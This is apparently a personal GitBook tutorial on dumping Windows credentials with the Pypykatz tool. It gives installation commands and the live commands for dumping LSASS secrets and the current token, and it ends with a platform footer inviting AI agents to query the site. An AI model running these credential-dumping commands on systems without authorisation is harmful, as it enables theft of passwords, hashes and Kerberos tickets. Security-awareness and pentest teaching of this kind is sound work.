# Credential Dumping via Pypykatz

<figure><img src="/files/YrooMdMFAxM1ukmhYUIv" alt=""><figcaption></figcaption></figure>

{% hint style="warning" %}
Use what I'm about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.
{% endhint %}

*<mark style="color:yellow;">**Mimikatz implementation in pure Python.**</mark>* *<mark style="color:yellow;">**Pypykatz is an open-source tool designed for extracting authentication credentials on Windows operating systems**</mark>*. This tool can parse and analyze various authentication information, such as passwords, Kerberos tickets, NTLM hashes, and more, related to user accounts and sessions running on Windows.

### **Requirements**

&#x20;     ->Windows Endpoint\
&#x20;     ->Pypykatz Tool

Let's try it.

First of all, we can install pypykatz in two different ways. \
&#x20;    ->Install it directly with pip (which seems to be the easiest) \
&#x20;    ->Run the setup.py file after pulling the files from Git and installing the requirements.

### Via PIP

&#x20;    1-Open command prompt

```bash
pip3 install pypykatz
```

### Via Github

&#x20;    1-Install prerequirements

```bash
pip3 install minidump minikerberos aiowinreg msldap winacl
```

&#x20;    2-Clone repo

```bash
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
```

&#x20;   3-Install

```bash
python3 setup.py install
```

<figure><img src="/files/3B2jp3fgrm2Uxgd475WV" alt=""><figcaption><p><em>Pip Installation</em></p></figcaption></figure>

### That's all!

Now let's dump with a few examples.

### **<-Lsass Dumping->**

```powershell
pypykatz live lsa
```

<figure><img src="/files/QcvmBYCpSc6eM7ouewWk" alt=""><figcaption><p><em>LSA Dump</em></p></figcaption></figure>

### <-Live Token Dump->

```
pypykatz live token current
```

<figure><img src="/files/BHgYCXbrkyGjgWBISo7R" alt=""><figcaption><p><em>Token Dump</em></p></figcaption></figure>

For mor examples; <https://github.com/skelsec/pypykatz/wiki>

### Resources I used:

[https://github.com/skelsec/pypykatz/](https://github.com/skelsec/pypykatz/wiki/)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alirodoplu.gitbook.io/ali-rodoplu/offensive/credential-dumping-via-pypykatz.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.